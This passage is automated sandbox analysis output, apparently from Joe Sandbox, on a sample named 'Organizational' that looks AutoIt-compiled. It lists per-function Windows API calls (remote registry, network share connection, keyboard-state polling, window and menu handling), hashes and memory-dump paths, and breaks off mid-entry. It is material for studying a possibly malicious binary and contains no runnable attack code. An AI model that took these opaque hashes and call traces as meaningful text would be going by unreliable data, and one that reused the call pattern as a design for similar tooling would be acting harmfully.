                                                    • Opcode ID: d42d84848e649fc6af6d9d283827dd74e5c14aebc8abd5d67df8bcfbe35f346d
                                                    • Instruction ID: efcc5b9697992a1c2ef65f2b03786633c89988d96ebb0f30f17410c2ea4cc2da
                                                    • Opcode Fuzzy Hash: d42d84848e649fc6af6d9d283827dd74e5c14aebc8abd5d67df8bcfbe35f346d
                                                    • Instruction Fuzzy Hash: D971F231A04609BEFB209B64DC85FAABF64FF05724F144216FA146A2D1CBB16864FF90
                                                    APIs
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                    • _memset.LIBCMT ref: 00F48489
                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F484BE
                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F484DA
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F484F6
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F48520
                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00F48548
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F48553
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F48558
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                    • API String ID: 1411258926-22481851
                                                    • Opcode ID: 7ad20d60277f54eb4bf70e0bb924cb1cd838c9b47f13c5869e3e73d158b98b62
                                                    • Instruction ID: 2266b77c259830a4c16ff6994355efb5cc8da7a84a7fb070a01d3f445266e2ec
                                                    • Opcode Fuzzy Hash: 7ad20d60277f54eb4bf70e0bb924cb1cd838c9b47f13c5869e3e73d158b98b62
                                                    • Instruction Fuzzy Hash: 9541F876C1022DABDF12EBA4DC95DEDBBB8FF04350F444129F815A21A1EB359E05EB90
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F7040D,?,?), ref: 00F71491
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                    • API String ID: 3964851224-909552448
                                                    • Opcode ID: 0a3b41fc266a1eb0cd52df8a339277dc0c3395c5db8bb432a895faf1a3526e53
                                                    • Instruction ID: 29931d4e1a6eddb0f2094aea4974f0af20d1062efec99654d0a854c6039bfa5b
                                                    • Opcode Fuzzy Hash: 0a3b41fc266a1eb0cd52df8a339277dc0c3395c5db8bb432a895faf1a3526e53
                                                    • Instruction Fuzzy Hash: 2741597150021A8BCF04EF54ED41AEA3324BF52310F548416EC965B292DF74ED59FB92
                                                    APIs
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                      • Part of subcall function 00F0153B: _memmove.LIBCMT ref: 00F015C4
                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F558EB
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F55901
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F55912
                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F55924
                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F55935
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: SendString$_memmove
                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                    • API String ID: 2279737902-1007645807
                                                    • Opcode ID: e4a6c48e42bb394fa03151b2f0598c2fc79963912c00a02a8c373d3891c5bccd
                                                    • Instruction ID: 1fd7882925ca4635b084ec1569dab51dc327970f6b4d0a0ab015007bef8a16c3
                                                    • Opcode Fuzzy Hash: e4a6c48e42bb394fa03151b2f0598c2fc79963912c00a02a8c373d3891c5bccd
                                                    • Instruction Fuzzy Hash: 5C118271950229B9DB20A7A1DC5ADFF7B7CFB92F51F400429B801A20D2DEA49908E5A1
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 208665112-3771769585
                                                    APIs
                                                    • timeGetTime.WINMM ref: 00F55535
                                                      • Part of subcall function 00F1083E: timeGetTime.WINMM(?,00000002,00EFC22C), ref: 00F10842
                                                    • Sleep.KERNEL32(0000000A), ref: 00F55561
                                                    • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00F55585
                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F555A7
                                                    • SetActiveWindow.USER32 ref: 00F555C6
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F555D4
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F555F3
                                                    • Sleep.KERNEL32(000000FA), ref: 00F555FE
                                                    • IsWindow.USER32 ref: 00F5560A
                                                    • EndDialog.USER32(00000000), ref: 00F5561B
                                                    Strings
                                                    Similarity
                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                    • String ID: BUTTON
                                                    • API String ID: 1194449130-3405671355
                                                    APIs
                                                      • Part of subcall function 00EF4D37: __itow.LIBCMT ref: 00EF4D62
                                                      • Part of subcall function 00EF4D37: __swprintf.LIBCMT ref: 00EF4DAC
                                                    • CoInitialize.OLE32(00000000), ref: 00F5DC2D
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F5DCC0
                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00F5DCD4
                                                    • CoCreateInstance.OLE32(00F83D4C,00000000,00000001,00FAB86C,?), ref: 00F5DD20
                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F5DD8F
                                                    • CoTaskMemFree.OLE32(?,?), ref: 00F5DDE7
                                                    • _memset.LIBCMT ref: 00F5DE24
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00F5DE60
                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F5DE83
                                                    • CoTaskMemFree.OLE32(00000000), ref: 00F5DE8A
                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00F5DEC1
                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 00F5DEC3
                                                    Similarity
                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                    • String ID:
                                                    • API String ID: 1246142700-0
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 00F50896
                                                    • SetKeyboardState.USER32(?), ref: 00F50901
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00F50921
                                                    • GetKeyState.USER32(000000A0), ref: 00F50938
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00F50967
                                                    • GetKeyState.USER32(000000A1), ref: 00F50978
                                                    • GetAsyncKeyState.USER32(00000011), ref: 00F509A4
                                                    • GetKeyState.USER32(00000011), ref: 00F509B2
                                                    • GetAsyncKeyState.USER32(00000012), ref: 00F509DB
                                                    • GetKeyState.USER32(00000012), ref: 00F509E9
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00F50A12
                                                    • GetKeyState.USER32(0000005B), ref: 00F50A20
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000001), ref: 00F4CE1C
                                                    • GetWindowRect.USER32(00000000,?), ref: 00F4CE2E
                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00F4CE8C
                                                    • GetDlgItem.USER32(?,00000002), ref: 00F4CE97
                                                    • GetWindowRect.USER32(00000000,?), ref: 00F4CEA9
                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00F4CEFD
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00F4CF0B
                                                    • GetWindowRect.USER32(00000000,?), ref: 00F4CF1C
                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00F4CF5F
                                                    • GetDlgItem.USER32(?,000003EA), ref: 00F4CF6D
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F4CF8A
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F4CF97
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    APIs
                                                      • Part of subcall function 00EF1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EF2412,?,00000000,?,?,?,?,00EF1AA7,00000000,?), ref: 00EF1F76
                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00EF24AF
                                                    • KillTimer.USER32(-00000001,?,?,?,?,00EF1AA7,00000000,?,?,00EF1EBE,?,?), ref: 00EF254A
                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00F2BFE7
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EF1AA7,00000000,?,?,00EF1EBE,?,?), ref: 00F2C018
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EF1AA7,00000000,?,?,00EF1EBE,?,?), ref: 00F2C02F
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EF1AA7,00000000,?,?,00EF1EBE,?,?), ref: 00F2C04B
                                                    • DeleteObject.GDI32(00000000), ref: 00F2C05D
                                                    Similarity
                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                    • String ID:
                                                    • API String ID: 641708696-0
                                                    APIs
                                                      • Part of subcall function 00EF29AB: GetWindowLongW.USER32(?,000000EB), ref: 00EF29BC
                                                    • GetSysColor.USER32(0000000F), ref: 00EF25AF
                                                    Similarity
                                                    • API ID: ColorLongWindow
                                                    • String ID:
                                                    • API String ID: 259745315-0
                                                    APIs
                                                      • Part of subcall function 00F10B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00F02A3E,?,00008000), ref: 00F10BA7
                                                      • Part of subcall function 00F10284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F02A58,?,00008000), ref: 00F102A4
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F02ADF
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F02C2C
                                                      • Part of subcall function 00F03EBE: _wcscpy.LIBCMT ref: 00F03EF6
                                                      • Part of subcall function 00F1386D: _iswctype.LIBCMT ref: 00F13875
                                                    Strings
                                                    Similarity
                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                    • API String ID: 537147316-3738523708
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,00F80980), ref: 00F5AF4E
                                                    • GetDriveTypeW.KERNEL32(00000061,00FAB5F0,00000061), ref: 00F5B018
                                                    • _wcscpy.LIBCMT ref: 00F5B042
                                                    Strings
                                                    Similarity
                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                    • API String ID: 2820617543-1000479233
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: __i64tow__itow__swprintf
                                                    • String ID: %.15g$0x%p$False$True
                                                    • API String ID: 421087845-2263619337
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F7778F
                                                    • CreateMenu.USER32 ref: 00F777AA
                                                    • SetMenu.USER32(?,00000000), ref: 00F777B9
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F77846
                                                    • IsMenu.USER32(?), ref: 00F7785C
                                                    • CreatePopupMenu.USER32 ref: 00F77866
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F77893
                                                    • DrawMenuBar.USER32 ref: 00F7789B
                                                    Strings
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                    • String ID: 0$F
                                                    • API String ID: 176399719-3044882817
                                                    • Opcode ID: 611807e69dabe7a3c49037687164f19799b3c52cf58053b41018f0ffb76cf9c7
                                                    • Instruction ID: fd47cc075e4215ce2bd8198c4a87ef4cbf27dc3874292cb3483e90a2eac88ed7
                                                    • Opcode Fuzzy Hash: 611807e69dabe7a3c49037687164f19799b3c52cf58053b41018f0ffb76cf9c7
                                                    • Instruction Fuzzy Hash: 8F414775A11309EFDB10EF64D888EAA7BB5FF49310F254129F909A7360C730A914EF61
                                                    APIs
                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F77B83
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00F77B8A
                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F77B9D
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00F77BA5
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F77BB0
                                                    • DeleteDC.GDI32(00000000), ref: 00F77BB9
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00F77BC3
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F77BD7
                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F77BE3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                    • String ID: static
                                                    • API String ID: 2559357485-2160076837
                                                    • Opcode ID: 9cc92409872a383a7cdf8978cb60349f4c637074eb90eea9c5384e56f834c45c
                                                    • Instruction ID: c5f08027a468b9aa8c34f1109fe96169462181d0b0e25b8c27c9e7490a0e7b05
                                                    • Opcode Fuzzy Hash: 9cc92409872a383a7cdf8978cb60349f4c637074eb90eea9c5384e56f834c45c
                                                    • Instruction Fuzzy Hash: A8319E32104218AFDF11AF68CC49FEB3B69FF49320F104215FA19A61A0CB75D824EBA5
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F1706B
                                                      • Part of subcall function 00F18D58: __getptd_noexit.LIBCMT ref: 00F18D58
                                                    • __gmtime64_s.LIBCMT ref: 00F17104
                                                    • __gmtime64_s.LIBCMT ref: 00F1713A
                                                    • __gmtime64_s.LIBCMT ref: 00F17157
                                                    • __allrem.LIBCMT ref: 00F171AD
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F171C9
                                                    • __allrem.LIBCMT ref: 00F171E0
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F171FE
                                                    • __allrem.LIBCMT ref: 00F17215
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F17233
                                                    • __invoke_watson.LIBCMT ref: 00F172A4
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                    • String ID:
                                                    • API String ID: 384356119-0
                                                    • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                    • Instruction ID: 9c5748fe5b65875a16a07474a737edcc19fcb7dc143cef6235a3974e445a19d1
                                                    • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                    • Instruction Fuzzy Hash: FD71F871E44717ABD714AE79DC41BDAB3B8AF14330F14422AF518E7281E774D981AF90
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F52CE9
                                                    • GetMenuItemInfoW.USER32(00FB7890,000000FF,00000000,00000030), ref: 00F52D4A
                                                    • SetMenuItemInfoW.USER32(00FB7890,00000004,00000000,00000030), ref: 00F52D80
                                                    • Sleep.KERNEL32(000001F4), ref: 00F52D92
                                                    • GetMenuItemCount.USER32(?), ref: 00F52DD6
                                                    • GetMenuItemID.USER32(?,00000000), ref: 00F52DF2
                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00F52E1C
                                                    • GetMenuItemID.USER32(?,?), ref: 00F52E61
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F52EA7
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F52EBB
                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F52EDC
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                    • String ID:
                                                    • API String ID: 4176008265-0
                                                    • Opcode ID: 86fbc593f422486c9f50a1c1c0470dc21f1be70d269608be0158d711b8dcc9a0
                                                    • Instruction ID: b2cbbec25b9f3c5028045be8f049ed6d1b64fde9c5ad65be1784385ac3348e90
                                                    • Opcode Fuzzy Hash: 86fbc593f422486c9f50a1c1c0470dc21f1be70d269608be0158d711b8dcc9a0
                                                    • Instruction Fuzzy Hash: 2761B171900249AFDB91DF64CC89ABEBBB8EB42316F140259FE41A7251D735AD09FB20
                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F775CA
                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F775CD
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F775F1
                                                    • _memset.LIBCMT ref: 00F77602
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F77614
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F7768C
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow_memset
                                                    • String ID:
                                                    • API String ID: 830647256-0
                                                    • Opcode ID: 6f55cea2c74b61f2246e4e44ba9858466cdd3a721f88948fb501d1eb96dccd88
                                                    • Instruction ID: c455e470236b32ce760a0066b2b74affb59dc42a70e49eb6745f8bc978831671
                                                    • Opcode Fuzzy Hash: 6f55cea2c74b61f2246e4e44ba9858466cdd3a721f88948fb501d1eb96dccd88
                                                    • Instruction Fuzzy Hash: 21618C75900308AFDB10EF64CC81EEE77F8AB49710F24419AFA18A72A1D770AD41EF61
                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F477DD
                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00F47836
                                                    • VariantInit.OLEAUT32(?), ref: 00F47848
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F47868
                                                    • VariantCopy.OLEAUT32(?,?), ref: 00F478BB
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F478CF
                                                    • VariantClear.OLEAUT32(?), ref: 00F478E4
                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00F478F1
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F478FA
                                                    • VariantClear.OLEAUT32(?), ref: 00F4790C
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F47917
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    • Opcode ID: 174633601617db1bd4a94f52da11126a42e70e3fe9479605da7775390d6215e2
                                                    • Instruction ID: 50a676a30990be7a08c54703536d1b15bcc9340a22e622be3af4edb1d2b3376f
                                                    • Opcode Fuzzy Hash: 174633601617db1bd4a94f52da11126a42e70e3fe9479605da7775390d6215e2
                                                    • Instruction Fuzzy Hash: 26415075A0021D9FDB00EFA4CC489EDBFB9FF08310F408069EA55A7261DB35A949DF90
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 00F50530
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00F505B1
                                                    • GetKeyState.USER32(000000A0), ref: 00F505CC
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00F505E6
                                                    • GetKeyState.USER32(000000A1), ref: 00F505FB
                                                    • GetAsyncKeyState.USER32(00000011), ref: 00F50613
                                                    • GetKeyState.USER32(00000011), ref: 00F50625
                                                    • GetAsyncKeyState.USER32(00000012), ref: 00F5063D
                                                    • GetKeyState.USER32(00000012), ref: 00F5064F
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00F50667
                                                    • GetKeyState.USER32(0000005B), ref: 00F50679
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 21bc0d8dd066a91aa82e2a5d66176143fefa8dae0732e8109bbb6460b4d7a58d
                                                    • Instruction ID: 4752ae08d62bb9568222ba3b774c234de3c81a7a81a3b3d31a8302416b9aae26
                                                    • Opcode Fuzzy Hash: 21bc0d8dd066a91aa82e2a5d66176143fefa8dae0732e8109bbb6460b4d7a58d
                                                    • Instruction Fuzzy Hash: 7841B230D047CA6DFF708A6488047B5BEA06F51325F4C405ADFC64B5C2EEA499DCAFA2
                                                    APIs
                                                      • Part of subcall function 00EF4D37: __itow.LIBCMT ref: 00EF4D62
